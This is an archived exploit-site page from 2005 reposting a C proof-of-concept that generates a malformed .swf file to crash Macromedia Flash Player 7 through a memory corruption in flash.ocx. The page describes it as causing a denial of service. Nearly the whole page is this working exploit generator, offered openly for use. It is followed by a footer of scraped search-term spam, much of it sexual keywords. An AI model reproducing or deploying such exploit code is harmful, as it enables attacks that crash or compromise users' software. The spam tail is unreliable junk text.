about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Macromedia Flash Player "Flash.ocx" Memory Corruption Remote PoC Exploit



2005-11-18 Macromedia Flash Player "Flash.ocx" Memory Corruption Remote PoC Exploit
Rated as : Critical 
Note : This proof-of-concept exploit generates a flash file that will
cause a DoS

/*

* ********************************************************* *
* Macromedia Flash Plugin - Buffer Overflow in flash.ocx                  
    *
* ********************************************************* *
* Version: v7.0.19.0                                                      
                    *
* PoC coded by: BassReFLeX                                                
             *
* Date: 11 Oct 2005                                                       
                   *
* ********************************************************* *

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";

//[SetBackgroundColor]
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";

//[DoAction] 1 pwn j00r 455!
char DoAction[] = 
"\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00";

//[ShowFrame]
char ShowFrame[] = "\x40\x00";

//[End]
char End[] = "\x00\x00";

int main(int argc,char* argv[])
{
system("cls");
printf("\n* *********************************************************
*");
printf("\n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx   
                   *");
printf("\n* *********************************************************
*");
printf("\n* Version: v7.0.19.0                                       
                                  *");
printf("\n* Date: 11 Oct 2005                                        
                                 *");
printf("\n* ProofOfConcept(POC) coded by: BassReFLeX                 
                  *");
printf("\n* *********************************************************
*");

if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}

printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF),f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof(DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof(ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End),f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_),f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
} 

void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}
securitydot.net - 2005-11-18

Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 09:17:17 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
wwwhollywo SIX VIDIO 200 /compo simple mac news for c videosexbr www.thiris vsftpd exp Womenssex arabiy sex Sexeimage. mambo Remo free india xpirin.com pngporn ex+videos solo sex Www,indo f santa bant ohix Asinalbum www.sx.co 1835 php ads Www.india www.sex.lk Www sex 60 Video phot Nude vidya santa bant +shopdbtes Www.sax.co worldswx.c www.sex fa Www.18 sex t620t davaoscand sexanimalm Pissig t620t movxsex win exploi www 89c pornograph article on vivvo t387t Dwonlod an Sabul sania sex.